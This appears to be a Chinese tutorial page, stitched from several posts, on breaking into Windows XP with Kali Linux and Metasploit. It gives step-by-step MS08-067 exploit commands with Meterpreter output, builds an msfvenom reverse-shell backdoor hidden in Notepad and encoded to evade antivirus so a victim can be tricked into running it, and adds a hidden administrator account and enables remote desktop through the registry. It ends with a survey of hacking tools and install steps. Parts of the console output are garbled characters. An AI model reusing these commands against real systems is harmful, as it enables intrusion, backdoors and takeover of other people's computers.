2023年7月8日发(作者:)
kalilinux⼊侵window实例我使⽤Kali Linux的IP地址是192.168.0.112;在同⼀局域⽹内有⼀台运⾏Windows XP(192.168.0.108)的测试电脑。本⽂演⽰怎么使⽤Metasploit⼊侵windows xp sp3。启动msfconsole:# msfconsole选择⼀个漏洞:msf > search platform: windows xp sp3
exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。查看某个漏洞的详细信息;包含使⽤⽅法、⽀持的平台等等,⾮常有帮助:msf > info exploit/windows/smb/ms08_067_netapi依次执⾏如下命令:msf > use exploit/windows/smb/ms08_067_netapi> set payload windows/meterpreter/bind_tcp> set RHOST 192.168.0.108 (设置⽬标主机IP地址)> exploit如果⽬标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使⽤其他漏洞。[*] Started bind handler[*] Automatically detecting [*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)[*] Attempting to trigger [*] Sending stage (751104 bytes) to 192.168.0.108[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32meterpreter >现在你就可以控制⽬标主机了,可以截屏、录⾳、视频、下载⽂件、杀进程等等;使⽤help查看可以执⾏的命令。演⽰使⽤后门程序侵⼊Windows原理:在Kali Linux上⽣成后门程序,然后把它发送给受害者,欺骗受害者运⾏(使⽤邮件、图⽚等等)。难点是需要过杀毒软件和防⽕墙。⽣成后门程序:我把后门程序隐藏到记事本程序中:查看Kali Linux的IP:ifconfig(192.168.0.112)创建后门程序,my_:# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x -e x86/jmp_call_additive -i 4 -k -f exe > my_上⾯命令使⽤加密试图躲过杀毒软件,但是,不要期望它可以⽣效。使⽤man msfvenom查看帮助。把它发送到Windows系统,并运⾏;如果不能运⾏换⽤其他加密⽅式。启动msfconsole:# msfconsoleuse exploit/multi/handlerset LHOST 192.168.0.112set LPORT 4445set payload windows/meterpreter/reverse_tcpshow optionsexploit等待受害者启动后门程序。OK,⼊侵成功。Windows服务器系统包括⼀个全⾯、集成的基础结构,旨在满⾜开发⼈员和信息技术(IT)专业⼈员的要求。此系统设计⽤于运⾏特定的程序和解决⽅案,借助这些程序和解决⽅案,信息⼯作⼈员可以快速便捷地获取、分析和共享信息。⼊侵者对Windows服务器系统的攻击主要是针对IIS服务器和组⽹协议的攻击。
⼊侵Windows服务器的流程
实验环境
实验环境.jpg试验⼯具kaili linux
其预装了许多试验⼯具,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] ⽤户可通过硬盘、live CD或live USB运⾏KaliLinux。Metasploit Metasploit是⼀个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本⾝附带数百个已知软件漏洞的专业级漏洞攻击⼯具。
知识点综述1.0 熟悉虚拟机vmware的相关知识,因为本环境是在VM中进⾏的,需要安装kaili linux和windows xp,以及设计虚拟机⽹络,其可以参考⽂章:.2.0 计算机⽹络相关知识点。2.1 vmware的虚拟⽹络与物理交换机相似,虚拟交换机也能将⽹络连接组件连接在⼀起。虚拟交换机⼜称为虚拟⽹络,其名称为VMnet0、VMnet1、VMnet2,以此类推。有少量虚拟交换机会默认映射到特定⽹络。
虚拟⽹络适配器模型.jpg
虚拟⽹络交换机.jpg桥接模式⽹络连接桥接模式⽹络连接通过使⽤主机系统上的⽹络适配器将虚拟机连接到⽹络
桥接.jpgNAT 模式⽹络连接使⽤ NAT 模式⽹络时,虚拟机在外部⽹络中不必具有⾃⼰的 IP 地址。主机系统上会建⽴单独的专⽤⽹络。
NAT⽹络.jpg仅主机模式⽹络连接仅主机模式⽹络连接可创建完全包含在主机中的⽹络。
主机模式.jpg2.2 IP(这⾥是ipv4)地址分类,⽹络类型。
ip地址,由《net-id,host-id》⼆部分组成。根据⽹络号的位数,把ip划分为A,B,C,D,E⼏⼤类,其中A类(0,127),B类(128,191),C类(192,223)3.0所以本次试验的虚拟机⽹络采⽤桥接⽅式,所以主要介绍下桥接。bridged(桥接模式)在这种模式下,VMWare虚拟出来的操作系统就像是局域⽹中的⼀台独⽴的主机,它可以访问⽹内任何⼀台机器。在桥接模式下,因为是独⽴的主机系统,那么就需要为虚拟系统配置IP、⼦⽹掩码。使⽤桥接模式的虚拟系统和宿主机器的关系,就像连接在同⼀个Hub上的两台电脑。想让它们相互通讯,你就需要为虚拟系统配置IP地址和⼦⽹掩码,否则就⽆法通信。⽽且还要和宿主机器处于同⼀⽹段,这样虚拟系统才能和宿主机器进⾏通信。
重要细节1.0 因为在vmware模拟kaili⼊侵windows xp所以要保证这⼆台虚拟机可以通信,试验的vmware采⽤桥接⽹络,⼆台虚拟机相当于独⽴的主机,在vmware想要通信,必须处于同⼀⽹段(就是⽹络号要⼀样),⼆台主机设置kaili设置为192.168.201.133,windows xp设置为192.168.201.135,它们是C类ip,前3位是⽹络号,都是192.168.201相同,可以通信,可以采⽤ping命令进⾏。2.0 为了试验效果明显,最好关闭掉windows的防⽕墙,这样⼊侵更容易,⽽且⾃⼰原本的主机把杀毒软件也关闭了。 ⼊侵开始1.0 查看linux的ip地址root@kali:~# ifconfigeth0: flags=4163
4.0 终端执⾏msfconsole 命令root@kali:~# msfconsole
# cowsay++ ____________< metasploit > ------------ ,__, (oo)____ (__) ) ||--|| * =[ metasploit v4.16.6-dev ]+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]+ -- --=[ 498 payloads - 40 encoders - 10 nops ]+ -- --=[ Free Metasploit Pro trial: /trymsp ]使⽤help命令查看其参数和⽤法msf > helpCore Commands============= Command Description ------- ----------- Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history irb Drop into irb scripting mode load Load a framework plugin quit Exit the console route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbersModule Commands=============== Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context edit Edit the current module with the preferred editor info Displays information about one or more modules loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Selects a module by nameJob Commands============ Command Description ------- ----------- handler Start a payload handler as job jobs Displays and manages jobs kill Kill a job rename_job Rename a jobResource Script Commands======================== Command Description ------- ----------- makerc Save commands entered since start to a file resource Run the commands stored in a fileDatabase Backend Commands========================= Command Description ------- ----------- db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspacesCredentials Backend Commands============================ Command Description ------- ----------- creds List all credentials in the database5.0 运⾏search netapi命令搜索netapi,在metasploip框架中列出所有与netapi相关的漏洞利⽤代码msf > search netapiMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption可以看到最后⼀个漏洞利⽤代码的评级为great,所以优先使⽤ms08_067_netapi。show tagrgets可以查看攻击平台show opinions可以查看攻击需要设置那些参数show payloads可以查看使⽤的攻击载荷6.0使⽤ use exploit/windows/smb/ms08_067_netapi ,设置参数msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.201.135rhost => 192.168.201.135msf exploit(ms08_067_netapi) > check[+] 192.168.201.135:445 The target is exploit(ms08_067_netapi) > set lhost 192.168.201.133lhost => 192.168.201.133msf exploit(ms08_067_netapi) > set target 34msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allportsmsf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.201.133:1
[*] 192.168.201.135:445 - Attempting to trigger [*] Sending stage (179267 bytes) to 192.168.201.135[*] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800set rhost是设置⽬标主机ipsetset lhost设置本机ipset payload设置攻击载荷exploit,是实⾏攻击,如果成功,会得到⼀个session,可以使⽤meterpreter模板进⼀步提取7.0 输⼊shell,获取受控zhuji的shel,我这⾥是windows的dos。meterpreter > shellProcess 1968 l 1 oft Windows XP [锟芥本 5.1.2600](C) 锟⽄拷权锟⽄拷锟⽄拷 1985-2001 Microsoft Corp.C:WINDOWSsystem32>net user ztg 123456 /addnet user ztg 123456 /add锟绞伙拷锟窖撅拷锟⽄拷锟节★拷锟⽄拷锟⽄拷锟⽄拷 NET HELPMSG 2224 锟皆伙拷锟矫⾰拷锟⽄拷锟侥帮拷锟⽄拷锟⽄拷C:WINDOWSsystem32>net localgroup administrators ztg /addnet localgroup administrators ztg /add锟⽄拷锟⽄拷系统锟⽄拷锟⽄拷 1378锟⽄拷锟⽄拷锟⽄拷锟绞伙拷锟⽄拷锟⽄拷锟⾓憋拷锟⽄拷锟⽄拷锟侥筹拷员锟⽄拷C:WINDOWSsystem32>REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /fREG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f锟⽄拷锟⽄拷锟缴癸拷锟⽄拷锟⽄拷C:WINDOWSsystem32>netstat -an
netstat -an
Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING TCP 192.168.201.135:139 0.0.0.0:0 LISTENING TCP 192.168.201.135:1031 192.168.201.133:1 ESTABLISHED UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1025 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.201.135:123 *:*
UDP 192.168.201.135:137 *:*
UDP 192.168.201.135:138 *:*
UDP 192.168.201.135:1900 *:*
C:WINDOWSsystem32>ipconfig -allipconfig -allWindows IP Configuration Host Name . . . . . . . . . . . . : dflx Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter 锟⽄拷锟⽄拷锟⽄拷锟⽄拷: Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Physical Address. . . . . . . . . : 00-0C-29-04-23-53 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.201.135 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . :
进⼊windows界⾯,dos⼤神可以畅通⽆阻了,不过如果喜欢windows界⾯,可以安装上⾯的⽅法,进⾏操作,在远程桌⾯。net user ztg 123456 /add添加⼀个⽤户名为ztg,密码123456C:WINDOWSsystem32>net localgroup administrators ztg /addnet localgroup administrators ztg /add把ztg添加到管理员⽤户组C:WINDOWSsystem32>REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /fREG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f是⼿动开启3389(远程桌⾯连接端⼝)1. METASPLOIT在应对⽹络渗透问题时,MetaSploit⾮常好⽤。因为MetaSploit是⽬前最先进的⿊客⼯具之⼀,它拥有⼀整套先进的渗透测试⼯具。该⼯具主要⾯向的是Linux操作系统,但也有Windows和Mac版本。2. NMAPNMAP,全名Network Mapper,是⼀个功能强⼤的开源⼯具,主要⽤于⽹络安全审计和⽹络搜寻。⽬前,该⼯具被⼴泛应⽤于查找有关⽬标⽹络和服务器设备的信息以及其他⽹络漏洞信息。⼤多数⽹络管理员将其⽤于⽹络清单、管理服务升级计划以及监控主机或服务正常运⾏等任务。Nmap适⽤于Linux、Windows和Mac。3. NESSUSNESSUS,全名Remote Security Scanner(远程安全扫描程序),是⼀款主要⽤于漏洞扫描的远程安全扫描⼯具。它是全球超过75,000家组织中最受欢迎的漏洞扫描程序。到现在为⽌,世界上已有越来越多的组织意识到了Nessus在审核关键业务、企业设备和应⽤程序上的巨⼤作⽤。4. WIRESHARKWireshark是⼀个免费的开源数据包分析器。它主要⽤于⽹络故障排除、分析和软件及通信协议的开发。最为关键的⼀点是,该⼯具允许使⽤者捕获和交互式浏览⽹络帧的内容,该功能使它成为了最受欢迎的⿊客⼯具之⼀。Wireshark适⽤于Linux和Windows操作系统。-Engineer ToolkitSocial-Engineer Toolkit(社会⼯程师⼯具包)是⼀款基于Python的社交⼯程渗透测试⾼级框架。它提供了制作多种类型社会⼯程攻击的组件,如凭据获取、鱼叉式⽹络钓鱼攻击、短信欺骗、⽹络钓鱼电⼦邮件等等。⽬前,Social-Engineer Toolkit仅适⽤于Linux系统。--------------------------1. Nmap
Nmap(Network Mapper)是⼀款⾮常著名的、⽤来扫描端⼝和绘制⽹络的、开源免费的⿊客⼯具,它是⼀个基于控制台的⼯具,另外⽅便使⽤,还有⼀个带有GUI的版本Zenmap。Nmap被世界各地的安全专业⼈员⽤于绘制⽹络空间,检查开放的端⼝,管理服务的升级计划,监控主机或服务的正常运⾏时间。nmap主要⽤于⽹络发现和执⾏安全审计。它使⽤原始IP数据包以创造性的⽅式来确定哪些主机在⽹络上可⽤,收集主机提供了哪些服务及其相关信息(应⽤程序名称和版本),使⽤的是什么操作系统,⽬标主机的过滤器/防⽕墙允许什么类型、什么版本的数据包穿过。2. Metasploit
Metasploit是⼀个漏洞利⽤⼯具,可以⽤来执⾏各种各样的任务,它是⽹络安全专业⼈员和⽩帽⿊客必不可少的⼯具。同时它是最著名的⼀个开源框架,可⽤于开发和执⾏针对远程⽬标机器的POC的⼯具。Metasploit本质上是为⽤户提供关于已知的安全漏洞的关键信息,帮助制定渗透测试、系统测试计划、漏洞利⽤的策略和⽅法。3. John the Ripper
John the Ripper是⼀个受欢迎的密码破解渗透测试⼯具,最常⽤于进⾏字典攻击。John the Ripper以⽂本字符串的样本(也称为“字典表”,包括常⽤和复杂的组合密码)为基础,并以与待破解密码同样的⽅式(包括加密算法和密钥)进⾏加密,并输出加密字符串,与真正密码进⾏⽐较。该⼯具还可以⽤于对字典库进⾏各种变形。另⼀个和John the Ripper类似的⼯具是THC Hydra(九头蛇)。John the Ripper和THC之间唯⼀的区别是,John the Ripper是⼀个离线的密码破解器,⽽九头蛇是⼀个“在线”的破解⼯具。4. THC Hydra
THC Hydra是⼀个⾮常受欢迎的密码破解⼯具,并且有⼀个⾮常活跃和经验丰富的开发团队在维护,⽀持Windows,Linux,FreeBSD,Solaris和OS X等操作系统。THC Hydra是⼀个快速稳定的⽹络登录攻击⼯具,它将使⽤字典或暴⼒攻击来尝试针对登录页⾯的各种密码和登录组合。当你需要强⼒破解远程认证服务时,THC Hydra常常是个不⼆选择⼯具。它可以对超过50个协议执⾏⾼效的字典攻击,包括telnet、FTP、HTTP、HTTPS、SMB、多种类型的数据库,等等。您可以轻松添加模块到该⼯具中,以此增强功能。5. OWASP Zed
OWASP Zed代理攻击(简称:ZAP)是⼀个⾮常流⾏的Web应⽤程序渗透测试⼯具,⽤于发现应⽤漏洞。它既可以被具有丰富经验的安全专家所⽤,同时对于开发⼈员和功能测试⼈员来说也是⾮常理想的测试⼯具箱。ZAP是⼀个流⾏的⼯具,因为它也有很多的⽀持者,并且OWASP社区也是⼀个为那些⽹络安全⼯作⼈员提供优秀资源的社区。ZAP提供⾃动扫描器以及其他各种⼯具,⽤于发现安全漏洞。理解和精通这个⼯具有利于你在渗透测试领域的职业⽣涯提升。6. Wireshark
Wireshark是⼀个⾮常流⾏的⽹络协议分析器⼯具,它可以⽤于检查办公⽹络或家庭⽹络中的各种东西。您可以实时捕获数据包并分析数据包以找到与⽹络相关的各种信息。该⼯具⽀持Windows,Linux,OS X,Solaris,FreeBSD和其他平台。Wireshark已经⾼度发达,它包括过滤器,彩⾊标注等细节功能,让⽤户深⼊了解⽹络流量和检查每个数据包。如果你想成为⼀个渗透测试相关⼯作或者作为⼀个⽹络安全从业者,学习如何使⽤Wireshark是必不可缺的。7. Aircrack-ng
Aircrack-ng是⼀个⽆线攻击⼯具,其之所有上榜是因为它具有强有⼒的⽆线⽹络密码的破解能⼒。这是⼀个⽤于802.11协议簇中WEP协议和WPA-PSK协议的密钥破解⼯具,它只要在监控模式下抓取⾜够的数据包,就可以恢复密钥。我们知道aircrack-ng提供标准的FMS攻击和优化了的Korek攻击,结合PTW攻击可使他们的攻击更有效。对于那些对⽆线攻击感兴趣的⼈来说,这是⼀个强烈推荐的⼯具。⽆线审计和渗透测试,学习Aircrack是必不可少的。8. Maltego
Maltego是数字取证⼯具,为企业⽹络或局域⽹络提供⼀个整体的⽹络运⾏情况和⽹络威胁画像。Maltego核⼼功能是分析真实世界中可触及的公开互联⽹信息之间的关系,包括“踩点”互联⽹基础设施以及收集拥有这些设施的企业组织和个⼈信息。Maltego提供⼀个范围⼴泛的图形化界⾯,通过聚合信息可即时准确地看到各个对象之间的关系,这使得我们可以看到隐藏的关联,即使它们是三重或四重的分离关系。9. Cain and Abel
Cain&Abel是微软操作系统的密码复原⼯具,通过嗅探⽹络它可轻易地复原各种密码,使⽤字典、暴⼒、密码分析破解加密密码,记录VoIP通话记录,解码加密的密码,恢复⽆线⽹络密钥,发现缓存密码、分析路由协议。开发Cain&Abel的本意,是希望它能对⽹络管理员、教师、安全顾问/专业⼈员、法医⼯作⼈员、安全软件供应商、专业渗透测试⼈员等提供帮助。10. Nikto Website Vulnerability Scanner
Nikto是另⼀个经典的⿊客⼯具,它是⼀个开源的(GPL)Web服务器扫描⼯具,综合扫描web服务器中的潜在危险的⽂件、CGI、版本检查、特定版本的问题、服务器配置项。被扫描项⽬和插件可以进⾏⾃动更新。Nikto也可以检查服务器配置项,⽐如多索引⽂件的存在,HTTP服务选项,该⼯具还可标识已安装的Web服务器和Web应⽤程序。Nikto也算是半个IDS⼯具了,所以它是在进⾏⽩帽渗透测试或⽩盒渗透测试时是⾮常有⽤的。⿊客⼯具也不仅限于以上讨论的那些,不同个⼈或团队都有不同的偏好。然⽽,这些都是被专业⼈⼠推荐的最受欢迎的⼯具。⽽且,所有这些⼯具都被集成在⽤于渗透测试的Linux发⾏版,如Kali Linux或BackBox系统,因此⼤家都极⼒推荐你安装⼀个合适的、能够⾃动更新⼯具库的、集成众多⿊客⼯具的Linux⼯具箱了。///////////////--------------------- 在真实环境下往往需要⼀个稳定、安全、可随时操作的环境,家中的电脑不能⼀直开着,⽽且还有解决公⽹IP的问题,这时候我们往往需要⼀台vps,但是市⾯上的vps往往并不⽀持安装kali系统,只有某些较贵的KVM构架vps可以不太稳定的安装kali系统,其他linux系统⽀持的测试软体也并不全⾯,于是今天我为⼤家介绍⼀款可以直接在常见Ubuntu设备上安装全部kali⼯具集的程序katoolin。安装:⾸先确保你的Python版本⼤于2.7python --version安装gitapt-get install git然后便开始安装sudo sugit clone /LionSec/ && cp katoolin/ /usr/bin/katoolinchmod +x /usr/bin/katoolin #给予权限sudo katoolin #打开katoolin之后输⼊1查看软件库2查看软件分类3安装经典菜单通知4安装kali菜单5帮助我们先输⼊1查看软件库再输⼊1添加软件源完成后输⼊2更新源,输⼊back返回上级或gohome返回主页接下来在主界⾯选择2 View Categories输⼊对应数字查看软件列表并安装,或者直接输⼊0安装全部⼯具。后⾯主界⾯的3和4⽤来安装菜单这⾥不做过多介绍。另外注意 执⾏apt-get update前必须先在katoolin内删除软件源这样很简单便安装了kali的全部⼯具集,是不是很⽅便呢。试玩
开个msfconsole
Tool-X是⼀个由python编写的⽤于安装kali linux⼯具的安装程序。在Tool-X的帮助下,你可以任意在Root或⾮Root的Android设备中安装⼯具。Tool-X中为我们提供了近251款⿊客⼯具,这些⼯具可供termux app和GNURoot Debian终端使⽤,你可以通过单击来安装任何你需要的⼯具。Tool-X专为Termux和GNURoot Debian终端⽽设计。现已⽀持Ubuntu。如何使⽤?输⼊ 0:表⽰安装所有⼯具输⼊ 1:显⽰所有可⽤⼯具,并通过编号选择想要安装的⼯具输⼊ 2:显⽰⼯具类别输⼊ 3:⽤于在termux中安装操作系统输⼊ 4:更新Tool-X输⼊ 5:关于我们输⼊ x:退出当前⽀持系统:AndroidUbuntu如何在termux中安装?打开termux app并键⼊以下命令。apt update pkg install gitgit clone /Rajkumrdusad/ Tool-Xchmod +x 如果⽆法正常执⾏请键⼊ ./现在,Tool-X已成功安装。键⼊Tool-X运⾏Tool-X。现在你可以在终端的任何位置,通过键⼊Tool-X来打开Tool-X。如何在GNURoot Debian终端中安装?打开GNURoot Debian app并输⼊以下命令。cd && git clone /Rajkumrdusad/ cd Tool-Xchmod +x 如果⽆法正常执⾏请键⼊ ./现在,Tool-X已成功安装。键⼊Tool-X运⾏Tool-X。现在你可以在终端的任何位置,通过键⼊Tool-X来打开Tool-X。如何在Ubuntu中安装?sudo apt-get Update sudo apt-get install gitsudo git clone /Rajkumrdusad/ Tool-Xchmod +x o sh 或 ./现在,Tool-X已成功安装。键⼊Tool-X运⾏Tool-X。现在你可以在终端的任何位置,通过键⼊Tool-X来打开Tool-X。最后提醒⼤家⼀句,请勿将该⼯具⽤于任何⾮法⽬的!
发布者:admin,转转请注明出处:http://www.yc00.com/web/1688821124a173186.html
评论列表(0条)